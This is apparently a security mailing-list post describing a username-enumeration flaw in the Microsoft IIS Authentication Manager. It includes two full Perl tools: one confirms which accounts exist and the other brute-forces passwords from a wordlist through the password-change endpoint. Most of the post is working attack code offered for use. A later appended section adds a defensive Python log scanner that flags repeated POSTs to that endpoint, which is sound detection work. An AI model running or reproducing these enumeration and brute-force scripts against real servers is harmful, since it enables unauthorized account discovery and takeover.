Microsoft IIS Authentication Manager Account Confirmation Vuln?

Let me start off by saying that I'm not sure if this already exists,
but I have never heard of it and neither has anyone I asked. So I'm
SURE you all know about the IIS Authentication Manager Vuln
(aexp4b.htr) and it can let people possibly bruteforce and change
local account info on a Windows box. Well, while messing with an IIS
machine this weekend I noticed that it also gives error messages that
basically let you verify whether or not a user account exists. For
example, if a user doesn't exist it says "The user name could not
be found." and if the user does exist it will say "The specified
network password is not correct". Anyway, I don't know if I'm the first
person to notice this, but I have never heard of it. Also attached are
two quick and dirty Perl scripts I threw together to automate both the
process of identifying an account and then bruteforcing it. Anyway,
anyone ever notice or hear of the confirming if an account exists thing?

###########################################################################################
# Microsoft IIS Authentication Manager BruteForce Tool - By JeiAr http://www.gulftech.org
###########################################################################################
# This tool can be used to brute force user accounts via dictionary attack on the Microsoft
# IIS Authentication Manager. More details here http://www.securityfocus.com/archive/1/8515
###########################################################################################

use LWP::UserAgent;

###########################################################################################
# Time to create the new LWP User Agent, Clear the screen, And print out the scripts header
###########################################################################################

$ua = new LWP::UserAgent;
$ua->agent("AgentName/0.1 " . $ua->agent);
system('cls');
&header;

###########################################################################################
# Gather all user inputted data. Such as the domain name, host and location of the wordlist
###########################################################################################

print "Host: ";
$host=<STDIN>;
chomp $host;
print "Domain: ";
$domain=<STDIN>;
chomp $domain;
print "Account: ";
$account=<STDIN>;
chomp $account;
print "Word List: ";
$list=<STDIN>;
chomp $list;

###########################################################################################
# Opens the wordlist and puts the data into an array. afterward setting the count variables
###########################################################################################

open (DATAFILE, "$list");
@datafile = <DATAFILE>;
chomp(@datafile);
$length = @datafile;
$count = 0;
$found = 0;

&space;
print "Cracked Accounts\n";
print "----------------\n";

###########################################################################################
# Creates the HTTP request, Checks the responses, then prints out the username if it exists
###########################################################################################

while ($count < $length) {
    $password = (@datafile[$count]);
    my $req = new HTTP::Request POST => "http://$host/_AuthChangeUrl?";
    $req->content_type('application/x-www-form-urlencoded');
    $req->content("domain=$domain&acct=$account&old=$password&new=$password&new2=$password");
    my $res = $ua->request($req);
    $pattern = "Password successfully changed";
    $_ = $res->content;
    if (/$pattern/) {
        print "$account : $password\n";
        last if (/$pattern/);
    }
    $count++;
}

###########################################################################################
# That's all folks. Prints out the final details and footer. Rest is just the subroutines :)
###########################################################################################

&space;
&footer;

sub header {
    print "IIS Auth Manager Brute Forcing Tool By JeiAr [http://www.gulftech.org] \n";
    print "---------------------------------------------------------------------- \n";
}

sub footer {
    print "Session Results:\n";
    print "--------------------\n";
    print "Number Of Words : $length \n";
    print "Number Of Tries : $count  \n";
}

sub space {
    print "\n" x2;
}

###########################################################################################
# Microsoft IIS Authentication Manager Discovery Tool - By JeiAr [http://www.gulftech.org]
###########################################################################################
# This tool is used to find existing user accounts via a dictionary attack on the Microsoft
# IIS Authentication Manager. More details here http://www.securityfocus.com/archive/1/8515
###########################################################################################

use LWP::UserAgent;

###########################################################################################
# Time to create the new LWP User Agent, Clear the screen, And print out the scripts header
###########################################################################################

$ua = new LWP::UserAgent;
$ua->agent("AgentName/0.1 " . $ua->agent);
system('cls');
&header;

###########################################################################################
# Gather all user inputted data. Such as the domain name, host and location of the wordlist
###########################################################################################

print "Host: ";
$host=<STDIN>;
chomp $host;
print "Domain: ";
$domain=<STDIN>;
chomp $domain;
print "Account List: ";
$list=<STDIN>;
chomp $list;

###########################################################################################
# Opens the wordlist and puts the data into an array. afterward setting the count variables
###########################################################################################

open (DATAFILE, "$list");
@datafile = <DATAFILE>;
chomp(@datafile);
$length = @datafile;
$count = 0;
$found = 0;

&space;
print "Verified Accounts\n";
print "-----------------\n";

###########################################################################################
# Creates the HTTP request, Checks the responses, then prints out the username if it exists
###########################################################################################

while ($count < $length) {
    $account = (@datafile[$count]);
    my $req = new HTTP::Request POST => "http://$host/_AuthChangeUrl?";
    $req->content_type('application/x-www-form-urlencoded');
    $req->content("domain=$domain&acct=$account&old=&new=&new2=");
    my $res = $ua->request($req);
    $pattern = "network password is not correct";
    $_ = $res->content;
    if (/$pattern/) {
        print "$account\n";
        $found++;
    }
    $count++;
}

###########################################################################################
# That's all folks. Prints out the final details and footer. Rest is just the subroutines :)
###########################################################################################

&space;
&footer;

sub header {
    print "IIS Auth Manager User Discovery Tool By JeiAr [http://www.gulftech.org]\n";
    print "-----------------------------------------------------------------------\n";
}

sub footer {
    print "Enumeration Results:\n";
    print "--------------------\n";
    print "Number Of Tries : $length \n";
    print "Confirmed Users : $found  \n";
}

sub space {
    print "\n" x2;
}

I hope the formatting of this message doesn't get trashed :o)
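
A defensive counterpart to the two scripts above, added here as an example and not part of the original post: it scans W3C extended-format IIS logs for clients that send bursts of POSTs to the _AuthChangeUrl endpoint, which is how both the account check and the password guessing appear on the server side. The sample log lines, the threshold and the window are constructed assumptions, and the log is assumed to record the date, time, c-ip, cs-method and cs-uri-stem fields.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

TARGET_STEM = "/_authchangeurl"  # endpoint the post's scripts POST to (lowercased)

# Constructed sample log (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = "\n".join(
    ["#Fields: date time c-ip cs-method cs-uri-stem sc-status"]
    + [f"2003-06-01 10:00:{s:02d} 192.0.2.10 POST /_AuthChangeUrl 200"
       for s in range(1, 7)]
    + ["2003-06-01 10:00:30 198.51.100.7 POST /_AuthChangeUrl 200",
       "2003-06-01 10:01:00 198.51.100.7 GET /default.htm 200",
       "truncated line"]
)

def parse_w3c(text):
    """Yield one dict per request line, using the most recent #Fields: header."""
    fields = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
        elif line and not line.startswith("#"):
            parts = line.split()
            if fields and len(parts) == len(fields):  # skip malformed rows
                yield dict(zip(fields, parts))

def flag_clients(text, threshold=5, window=timedelta(seconds=60)):
    """Return {client_ip: peak} for clients with >= threshold POSTs to the
    password-change endpoint inside any sliding window."""
    recent, peaks = defaultdict(deque), {}
    for row in parse_w3c(text):
        if row.get("cs-method") != "POST":
            continue
        if row.get("cs-uri-stem", "").lower() != TARGET_STEM:
            continue
        ts = datetime.strptime(f'{row["date"]} {row["time"]}', "%Y-%m-%d %H:%M:%S")
        q = recent[row["c-ip"]]
        q.append(ts)
        while ts - q[0] > window:  # drop requests older than the window
            q.popleft()
        if len(q) >= threshold:
            peaks[row["c-ip"]] = max(peaks.get(row["c-ip"], 0), len(q))
    return peaks

if __name__ == "__main__":
    print(flag_clients(SAMPLE_LOG))
```

The request body is not in the log, so the count covers every POST to the endpoint from a client, whichever account names or passwords it carried.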

